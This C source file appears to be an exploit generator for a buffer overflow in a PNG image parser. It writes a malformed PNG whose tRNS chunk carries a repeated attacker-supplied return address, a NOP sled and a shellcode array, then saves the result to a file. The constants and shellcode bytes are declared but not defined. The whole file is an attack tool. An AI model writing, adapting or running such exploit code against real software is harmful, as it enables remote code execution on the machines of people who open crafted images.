
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
typedef int u_char ;
typedef int retaddr ;


 int ALIGN ;
 int BS ;
 int EXIT_FAILURE ;
 int IHDR_LEN ;
 int MAJIC_LEN ;
 int NNOPS ;
 int NOP ;
 char* OUTFILE ;
 int O_CREAT ;
 int O_EXCL ;
 int O_WRONLY ;
 int RETADDR_BYTES ;
 int SHELL_LEN ;
 int TRNS_LEN ;
 int close (int) ;
 int die (char*) ;
 int fprintf (int ,char*,char*) ;
 int htonl (int) ;
 int memcpy (int *,int *,int) ;
 int memset (int *,int ,int) ;
 int open (char*,int,int) ;
 int * png_ihdr ;
 int * png_majic ;
 int * png_trns_len_id ;
 int * sc ;
 int sscanf (char*,char*,int *) ;
 int stderr ;
 int write (int,int *,int) ;

int main(int argc, char **argv)
{
    int fd = 0, len = 0, x = 0, chunk_len = 0;
    char *filename = OUTFILE;
    u_char buf[BS];
    u_long retaddr = 0;


    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(argc > 2)
        filename = argv[2];


    memset(buf, 0, BS);
    sscanf(argv[1], "%lx", &retaddr);





    memcpy(buf, png_majic, MAJIC_LEN);
    len += MAJIC_LEN;
    memcpy(buf+len, png_ihdr, IHDR_LEN);
    len += IHDR_LEN;
    memcpy(buf+len, png_trns_len_id, TRNS_LEN);
    len += TRNS_LEN;


    for(x = 0; x < RETADDR_BYTES-3; x += 4)
        memcpy(buf+len+x+ALIGN, &retaddr, sizeof(retaddr));
    x += ALIGN;
    len += x;
    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;



    chunk_len = x + NNOPS + SHELL_LEN;
    *(u_long *)(buf+MAJIC_LEN+IHDR_LEN) = htonl(chunk_len);



    len += sizeof(u_long);



    if( (fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");
    if(write(fd, buf, len) != len)
        die("write");
    close(fd);

    return 0;
}
